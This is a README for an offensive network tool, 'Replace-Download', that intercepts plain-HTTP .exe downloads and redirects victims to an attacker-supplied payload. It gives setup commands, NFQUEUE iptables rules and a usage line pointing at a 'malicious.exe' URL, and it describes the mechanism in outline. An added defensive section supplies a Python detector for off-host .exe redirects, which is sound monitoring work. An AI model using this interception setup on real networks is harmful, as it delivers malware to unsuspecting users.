Replace-Download is a Python tool designed to intercept HTTP .exe download requests on a network and replace them with a custom payload. This can be useful for penetration testing and red team exercises.
⚠️ Warning: Use this tool only in environments where you have explicit permission. Unauthorized use on public or private networks is illegal.
- Detect outgoing `.exe` download requests.
- Redirect download requests to a custom payload URL.
- Prevent infinite loops by ignoring requests to your own payload.
- Simple setup using `netfilterqueue` and `scapy`.
- Python 3.x
- Linux system (tested on Ubuntu/Debian)
- `scapy` Python library
- `netfilterqueue` Python library
```bash
pip3 install scapy netfilterqueue
```

You also need to set up iptables rules to forward packets to the netfilter queue:

```bash
sudo iptables -I FORWARD -j NFQUEUE --queue-num 0
sudo iptables -I OUTPUT -j NFQUEUE --queue-num 0
sudo iptables -I INPUT -j NFQUEUE --queue-num 0
```

```bash
python run.py -u <payload_url>
python3 run.py -u http://192.168.1.100/malicious.exe
```
- `-u` or `--url`: The full URL to the payload `.exe` file that will replace detected downloads.
- The script listens to all HTTP traffic using a netfilter queue.
- When a `.exe` download request is detected, the TCP ACK is stored.
- When the server responds, the script replaces the original payload with a redirect to the custom `.exe` payload.
- Checks are in place to prevent replacing your own payload multiple times.
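From the defender's side, the behaviour listed above appears in proxy or capture data as a plain-HTTP `.exe` request answered with a redirect to a different host. The following detection example is added here and is not part of the tool; the sample transactions, host names and the function names `parse_head` and `suspicious_exe_redirects` are constructed for illustration, and it assumes the injected response is a 3xx with a `Location` header.

```python
from urllib.parse import urlsplit

# Constructed sample transactions (plain-HTTP request/response heads), not captured traffic.
SAMPLE = [
    ("GET /tools/setup.exe HTTP/1.1\r\nHost: downloads.example.com\r\n\r\n",
     "HTTP/1.1 301 Moved Permanently\r\nLocation: http://192.0.2.50/update.exe\r\n\r\n"),
    ("GET /tools/setup.exe HTTP/1.1\r\nHost: downloads.example.com\r\n\r\n",
     "HTTP/1.1 302 Found\r\nLocation: http://downloads.example.com/v2/setup.exe\r\n\r\n"),
    ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
     "HTTP/1.1 301 Moved Permanently\r\nLocation: http://cdn.example.net/index.html\r\n\r\n"),
    ("GET /pkg/app.EXE?v=3 HTTP/1.1\r\nHost: files.example.org:8080\r\n\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"),
]

def parse_head(raw):
    """Split an HTTP message head into (start-line fields, lower-cased header dict)."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0].split(" ", 2), headers

def suspicious_exe_redirects(transactions):
    """Return (requested_url, location) for .exe GETs redirected to another host."""
    hits = []
    for raw_req, raw_resp in transactions:
        (method, target, _), req_h = parse_head(raw_req)
        resp_start, resp_h = parse_head(raw_resp)
        if method != "GET" or not urlsplit(target).path.lower().endswith(".exe"):
            continue
        status = resp_start[1] if len(resp_start) > 1 else ""
        location = resp_h.get("location")
        if not (status.startswith("3") and location):
            continue
        req_host = urlsplit("//" + req_h.get("host", "")).hostname or ""
        loc_host = urlsplit(location).hostname or req_host  # relative Location: same host
        if loc_host != req_host:
            hits.append((f"http://{req_h.get('host', '')}{target}", location))
    return hits

if __name__ == "__main__":
    for requested, location in suspicious_exe_redirects(SAMPLE):
        print(f"ALERT: {requested} redirected off-host to {location}")
```

Legitimate download sites also redirect to CDNs on other hosts, so treat a hit as a triage signal to compare against known mirrors rather than as proof of tampering.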
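After finishing, remove the iptables rules to restore normal traffic:

```bash
sudo iptables -F
```

Note that `iptables -F` flushes every rule in the filter table, not only the three NFQUEUE rules added during setup.

This tool is intended only for educational purposes and authorized security testing. Misuse may result in legal consequences.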